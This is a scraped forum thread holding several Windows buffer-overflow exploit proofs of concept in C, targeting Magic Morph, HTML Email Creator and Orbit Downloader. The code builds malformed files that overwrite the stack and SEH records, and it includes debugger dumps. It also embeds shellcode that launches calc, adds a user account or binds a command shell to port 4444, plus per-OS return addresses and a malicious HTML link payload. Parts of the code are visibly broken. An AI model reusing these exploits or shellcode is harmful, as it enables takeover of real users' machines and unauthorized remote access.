60 60 60 60 ```````` * 0012EFF4 60 60 60 60 60 60 60 60 ```````` * 0012EFFC 59 59 59 59 59 59 59 59 YYYYYYYY * 0012F004 59 59 59 59 59 59 59 59 YYYYYYYY * 0012F00C 59 59 59 59 59 59 59 59 YYYYYYYY * ************************************************* */ /************************************************************************************** Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org * Special greetz to OSHO,!_30,str0ke,Carcabot. * Vizite my website for more bugs ,papers, exploits, pocs and programming techniques. * flo's exploits * ************************************************************************************* */ /************************************************************************* DEMO * C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe * ********************************************************************* * Magic Morph .MOR File Stack Buffer Overflow POC * The usage is: * All Credits fl0 fl0w * * -f FILE.mor * ************************************************************************** * C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST * File DONE ! * ************************************************************************** */ /************************************************************************************ Technicall details * This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3 * ************************************************************************************* */ //START Algorithm #include "stdio.h" #include "string.h" #include "stdlib.h" #include "windows.h" #include "stdint.h" #include "getopt.h" typedef struct flo { uint8_t a; uint8_t b; uint8_t c; }F; void buildFile(char *fname) { uint8_t hexfileP1[] = { 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73, 0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34, 0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62, }; uint8_t hexfileP2[] = { 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, }; uint8_t hexfileP3[] = { 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C, 0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, } ; FILE *f; f = fopen(fname ,"wb"); F *Gf; Gf = (F*)malloc(sizeof(F)); Gf->a = 0x43; Gf->b = 0x3A; Gf->c = 0x5C; uint8_t B[100]; memcpy(B, Gf, sizeof(Gf)); fwrite(B, sizeof(uint8_t), 3, f); fwrite(hexfileP1, sizeof(uint8_t), sizeof(hexfileP1), f); fwrite(hexfileP2, sizeof(uint8_t), sizeof(hexfileP2), f); fwrite(hexfileP3, sizeof(uint8_t), sizeof(hexfileP3), f); fclose(f); } void args(int argc, char *argv[]) { int file; int a; if(a) while((a = getopt(argc, argv, "f")) != EOF) { switch(a) { case 'f': file = (int)optarg; break; default: exit(-1); } } } void Usage (char *Name) { system("CLS"); printf("*********************************************************************\n"); fprintf ( stdout , "\t\tMagic Morph .MOR File Stack Buffer Overflow POC\n"); printf("The usage is:\n"); fprintf ( stdout , "\t\tAll Credits fl0 fl0w\n"); } void Menu() { fprintf(stderr, "\n" "\t-f FILE.mor\n" "*********************************************************************" "\n"); } int main(int32_t argc , char *argv[]) { if(argc < 2) { Usage(argv[0]); Menu(); exit(-1); } char b[100]; strcpy(b, argv[2]); strcat(b, ".mor"); buildFile(; printf("File DONE !\n"); return 0; } //END Algorithm Report this post
- 1 reply
-
- 1
-
-
Salut bro's ,got 0F**gday /*0day HTML Email Creator & Sender v2.3 Local Buffer Overflow(Seh) Poc ******************************************************************** Debugging info Seh handler is overwriten , the offset is at 60 bytes in our buffer so you have to build your buffer as follows: [PONTER TO NEXT SEH]-------[SEH HANDLER]----[NOP]------[SHELLCODE] | | | | JMP 4 bytes POP POP RET 50*0x90 calc.exe ********************************************************************* */ /* Code execution is possible. CPU Registers EAX 00000000 ECX 00000208 EDX 00000000 EBX 00000029 ESP 0012E224 EBP 7C8101B1 kernel32.lstrcpynA ESI 90909090 <------------------CONTROLED EDI 00001209 EIP 0042E1C7 HtmlEmai.0042E1C7 ESP points to 0012E224 Stack looks like 0012E224 90909090 0012E228 00000029 )... 0012E22C 00415D56 V]A. RETURN to HtmlEmai.00415D56 from HtmlEmai.0042E1BF 0012E230 00000208 .. 0012E234 003F9758 X—?. 0012E238 003FBD19 ½?. 0012E23C 00000000 .... 0012E240 00000029 )... 0012E244 90909090 0012E248 90909090 0012E24C 90909090 0012E250 90909090 0012E254 90909090 0012E258 90909090 0012E25C 90909090 0012E260 90909090 0012E264 90909090 0012E268 90909090 0012E26C 90909090 0012E270 90909090 0012E274 90909090 0012E278 90909090 0012E27C 909011EB ë 0012E280 41414141 AAAA 0012E284 90909090 0012E288 90909090 0012E28C 90909090 0012E290 90909090 0012E294 90909090 0012E298 90909090 0012E29C 90909090 0012E2A0 90909090 0012E2A4 90909090 0012E2A8 90909090 0012E2AC EB5903EB ëYë 0012E2B0 FFF8E805 èøÿ 0012E2B4 4949FFFF ÿÿII 0012E2B8 49494949 IIII 0012E2BC 49494949 IIII 0012E2C0 49494949 IIII 0012E2C4 51494949 IIIQ 0012E2C8 636A375A Z7jc 0012E2CC 30423058 X0B0 0012E2D0 426B4250 PBkB 0012E2D4 42417341 AsAB 0012E2D8 32414232 2BA2 0012E2DC 41304141 AA0A 0012E2E0 42385841 AX8B 0012E2E4 38755042 BPu8 */ /* ASM Instructions 0042E1C7 |. 8B06 MOV EAX,DWORD PTR DS:[ESI] <-------This is where goes wrong => DS:[90909090]=??? EAX=00000000 0042E1C9 |. 8378 F4 01 CMP DWORD PTR DS:[EAX-C],1 0042E1CD |. 8D58 F4 LEA EBX,DWORD PTR DS:[EAX-C] 0042E1D0 |. 7F 05 JG SHORT HtmlEmai.0042E1D7 EAX is writen with DWORD NULL byte. */ /* Seh Chain 0012E894 909011EB ë Pointer to next SEH record <------ overwrite with this "\xEb\x04\x90\x90" 0012E898 41414141 AAAA SE handler <-----POP POP RET */ #include <stdio.h> #include <windows.h> #include <string.h> #include <getopt.h> #include <stdint.h> typedef struct Start { uint8_t sh; uint8_t st; uint8_t sm; uint8_t sl; }HTML; typedef struct Middle { uint8_t sh; uint8_t se; uint8_t sa; uint8_t sd; }HEAD; typedef struct End { uint8_t sb; uint8_t so; uint8_t sD; uint8_t sy; }BODY; #define BUFFERSIZE 0x1A0A #define FILESIZE 29A #define SRC "<img src=" void Fbuild(char *fname) { HTML *ht_ml; HEAD *he_ad; BODY *bo_dy; char *memBuffer; //"\x48\x54\x4D\x4C" -html ht_ml = (HTML*)malloc(sizeof(HTML)); he_ad = (HEAD*)malloc(sizeof(HEAD)); bo_dy = (BODY*)malloc(sizeof(BODY)); memBuffer = (char*)malloc(BUFFERSIZE); if(ht_ml == NULL || he_ad == NULL || bo_dy == NULL || memBuffer == NULL) { exit(-1); } ht_ml->sh = 0x48; ht_ml->st = 0x54; ht_ml->sm = 0x4D; ht_ml->sl = 0x4C; //second structure //HEAD "\x48\x45\x41\x44" he_ad->sh = 0x48; he_ad->se = 0x45; he_ad->sa = 0x41; he_ad->sd = 0x44; //thierd structure //"\x42\x4F\x44\x59" bo_dy->sb = 0x42; bo_dy->so = 0x4F; bo_dy->sD = 0x44; bo_dy->sy = 0x59; FILE *f; f = fopen(fname, "w"); if( f == NULL) { exit(-1); } int32_t offset = 0; memcpy(memBuffer, "<", 1); offset += 1; memcpy(memBuffer+offset, ht_ml, sizeof(ht_ml)); offset += sizeof(ht_ml); memcpy(memBuffer+offset, ">", 1); offset += 1; memcpy(memBuffer+offset, "<", 1); offset += 1; memcpy(memBuffer+offset, he_ad, sizeof(he_ad)); offset += sizeof(he_ad); memcpy(memBuffer+offset, ">", 1); offset += 1; memcpy(memBuffer+offset, "<", 1); offset += 1; memcpy(memBuffer+offset, "\\", 1); offset += 1; memcpy(memBuffer+offset, he_ad, sizeof(he_ad)); offset += sizeof(he_ad); memcpy(memBuffer+offset, ">", 1); offset += 1; memcpy(memBuffer+offset, "<", 1); offset += 1; memcpy(memBuffer+offset, bo_dy, sizeof(bo_dy)); offset += sizeof(bo_dy); memcpy(memBuffer+offset, ">", 1); offset += 1; uint8_t shit[] ={ 0x3C,0x69,0x6D,0x67,0x20,0x73,0x72,0x63,0x3D }; memcpy(memBuffer+offset, shit, sizeof(shit)); offset += sizeof(shit); memset(memBuffer+offset, 0x22, 1); offset += 1; memset(memBuffer+offset, 0x41, 4616); offset += 4616; memset(memBuffer+offset, 0x22, 1); offset += 1; memcpy(memBuffer+offset, ">", 1); offset += 1; memcpy(memBuffer+offset, "<", 1); offset += 1; memcpy(memBuffer+offset, "\\", 1); offset += 1; memcpy(memBuffer+offset, bo_dy, sizeof(bo_dy)); offset += sizeof(bo_dy); memcpy(memBuffer+offset, ">", 1); offset += 1; memcpy(memBuffer+offset, "<", 1); offset += 1; memcpy(memBuffer+offset, "\\", 1); offset += 1; memcpy(memBuffer+offset, ht_ml, sizeof(ht_ml)); offset += sizeof(ht_ml); memcpy(memBuffer+offset, ">", 1); offset += 2; fwrite(memBuffer, offset , 1, f); fwrite("\x00", 1, 1, f); printf("File Done!\n"); } int main(int argc, char *argv[]) { char *fname = argv[1]; system("CLS"); fprintf(stdout , ":: ::\n"); fprintf(stdout , "Embedthis Appweb Remote Stack Overflow POC\n"); fprintf(stdout , "All Credits:fl0 fl0w\n"); fprintf(stdout , ":: ::\n"); if(argc < 2) { printf("Usage is %s filename.html\n", argv[0]); exit(-1); } Fbuild(fname); return 0; }
- 1 reply
-
- 1
-
-
demo video http://www.filefactory.com/file/afg57be/n/orbit_test_avi http://www.sendspace.com/file/uyu8qi http://files.filefront.com/orbit+testavi/;13220935;/fileinfo.html #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #define SIZE 10000 #define OFFSET 504 void file (char * , char *); void write (char *, int ,char *); void print (); void usage (char *); void target (); /*tnx Metasploit for Shellcodes*/ //LAUNCH CALC.EXE char shellcode_1[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63" "\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32" "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38" "\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e" "\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62" "\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74" "\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c" "\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39" "\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b" "\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64" "\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37" "\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b" "\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b" "\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47" "\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f" "\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61" "\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f" "\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55" "\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42" "\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57" "\x70\x63"; //ADD USER char shellcode_2[ ]= "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50" "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f" "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b" "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09" "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8" "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b" "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b" "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0" "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40" "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92" "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3" "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71" "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8" "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9" "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7" "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0" "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd" "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f" "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1" "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40" "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3" "\x03\x75\x2c\x6f\x80\x8a\xfa\x90"; //REVERSE CMD SHELL ->BIND PORT char shellcode_3[] = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50" "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f" "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b" "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09" "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8" "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b" "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b" "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0" "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40" "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92" "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3" "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71" "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8" "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9" "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7" "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0" "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd" "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f" "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1" "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40" "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3" "\x03\x75\x2c\x6f\x80\x8a\xfa\x90"; struct { char *OS; unsigned int EIP; } Retcodes [] = { { "Microsoft Windows Pro sp3 English:", 0x7C8369F0 },/*call esp */ { "Microsoft Windows Pro sp3 English:", 0x7C86467B }, /*jmp esp */ { "\t\t\t UNIVERSAL_1:", 0x1008E153 }, { "\t\t\t UNIVERSAL_2:", 0x219FB9B }, { "Windows 2000 5.0.1.0 SP1 (IA32) English:", 0x69952208 }, /*jmp esp*/ { "sss", 0x7C868667} , }, t; int main(int argc, char *argv[]) { int X, shell ; char *L, *Z; char *actbuff; actbuff = (char *)malloc(SIZE); if (argc < 3) { system("cls"); printf("***********************************************************************\n"); print (); usage (argv[0]); Sleep(1000); printf("\n\n"); printf("\t\t\t\tTargets\n"); target(); printf("************************************************************************\n"); exit (0); } L = argv[0]; Z = argv[1]; shell = atoi(argv[2]); write (actbuff, shell, Z); file (argv[3], actbuff); print(); printf("Loading ..."); Sleep(3000); printf ("File build succesfully\n"); return 0; } void target() { int i; for (i = 0; i < sizeof(Retcodes)/sizeof(t); i++) printf("> %d %s <0x%.8x> \n", i, Retcodes[i].OS, Retcodes[i].EIP); } void file (char *filename, char *buff) { FILE *f; if ((f = fopen(filename, "wb")) == NULL) { printf("Error writing file\n"); exit(0); } fwrite (buff, 1 , strlen(buff), f); free (buff); fclose (f); } void write (char *buffer, int shellc_type, char *Y) { unsigned int offset = 0; unsigned int RET = Retcodes[atoi(Y)].EIP; memset (buffer ,0x90, SIZE); offset = OFFSET; memcpy (buffer + offset, &RET, 4); offset += 4; switch (shellc_type) { case 1: memcpy (buffer + offset ,shellcode_1, strlen(shellcode_1)); offset += strlen(shellcode_1); memset (buffer + offset, 0x00, 1); break; case 2: memcpy (buffer + offset ,shellcode_2, strlen(shellcode_2)); offset += strlen(shellcode_2); memset (buffer + offset, 0x00, 1); break; case 3: memcpy (buffer + offset ,shellcode_3, strlen(shellcode_3)); offset += strlen(shellcode_3); memset (buffer + offset, 0x00, 1); break; } } void usage(char *K) { printf ("Usage is: %s [target] [shell_type] [filename].txt\n", K); fputs ( "\t\tRetaddress for your version of Windows\n" "\t\tShell_type is the type of shellcode you want to run\n" "\t\t\t *Press 1 To Run CALC.EXE\n" "\t\t\t *Press 2 To Add User\n" "\t\t\t *Press 3 To Bind Shell to Port 4444\n" "\t\tExample\n" "\t\t\torbit_expl.exe 0 3 file.txt\n" ,stdout); } void print() { fputs( "\t\tOrbit Downloader V2.8.5 Malformed URL Buffer Overflow Exploit\n" "\t\tby fl0 fl0w\n" "\t\tContact: flo_flow_supremacy@yahoo.com\n" "\n", stdout); } Remote concept <html><body> <a href="http://www. ðiƒ|ëYëèøÿÿÿIIIIIIIIIIIIIIIIIQZ7jcX0B0PBkBAsAB2BA2AA0AAX 8BBPu8iil8hATwpWpuPnkAUUlnkCLfeAhEQXoLKPOb8nkAO106aJKAYlKttnkDAJNGAKpoillLDKpCDvg KqJjfmfa9RZKJTukbtVDs4AeKUNksoTdS1jK56lKdL0KlKsoWluQjKlK7llKwqhkLIqLQ4C4ksFQyPqtL 